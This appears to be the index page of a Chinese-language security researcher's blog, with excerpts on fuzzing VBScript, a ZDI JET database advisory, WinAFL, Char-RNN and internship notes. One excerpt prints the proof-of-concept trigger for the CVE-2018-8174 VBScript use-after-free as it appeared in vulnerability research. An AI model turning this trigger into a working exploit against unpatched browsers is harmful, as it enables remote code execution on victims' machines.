GC algorithm

书中的一些稍微难理解的基础概念:

对象使用者在对象中可访问的部分,称为“域”

域中的数据类型大致分2种:

阅读全文

What have I done recently?

最近几个月事情干的有点杂,来慢慢捋一捋。

  1. 首先关注到前些时间爆出VBScript的漏洞,影响很大。分析一下,觉得这2个漏洞理解起来很简单。所以尝试去fuzz VBScript。自己写了一些vb的语法规则,写的很鸡肋。因为要满足语法正确的情况下,尽可能的达到随机组合的目的。

阅读全文

ZDI-Jet_OOB

最近ZDI上放出了个Microsoft JET数据库引擎中的一个严重的远程执行代码漏洞。。
说是远程执行 (= =) 额。还搞不定是怎么做到远程的

有兴趣的朋友移步:
https://www.zerodayinitiative.com/blog/2018/9/20/zdi-can-6135-a-remote-code-execution-vulnerability-in-the-microsoft-windows-jet-database-engine

阅读全文

长路漫漫

实习这么久,学到了不少东西 。

前段时间复现的那个洞给自己对漏洞挖掘和利用这块涨了不少的知识。

好像并没有想象中的那么牛逼。但是对我来说,确实还是很有难度。这却只是漏洞分析与利用这一部分。 关键的漏洞挖掘,才是最最艰难的一块。

就目前的情况来看,想要挖洞,无论是 ie ,edge ,ff,chrome。。。哪一个都不容易

阅读全文

Char-RNN

一、Char RNN

项目链接: https://github.com/karpathy/char-rnn

阅读全文

language

最近看了一下深度学习,用Lua 写的。。

然后前端时间又报出了2个vb的CVE ,看了看POC,很简单的溢出。

poc 如下:

CVE-2018-8174

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<html>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<script language="VBScript">

dim b
dim c
Class cla1

Private Sub Class_Terminate
set c = b
b = 0
End Sub

Function test
msgbox 3
End Function

End Class

set b = New cla1
b = 0

c.test

</script>
</html>

阅读全文

Hello , my friend。Do you like to play ♂ games?

这里就当一个记录心路历程的地方吧。

阅读全文

winAfl

WinAFL

  1. 背景
    从目标二进制文件中查找新的执行路径。
  2. WinAFL 的路径
    使用DynamoRIO 来动态插桩,用来测量和提取目标覆盖率。
  3. 搭建,使用
    http://www.4hou.com/technology/2800.html
    status screen

阅读全文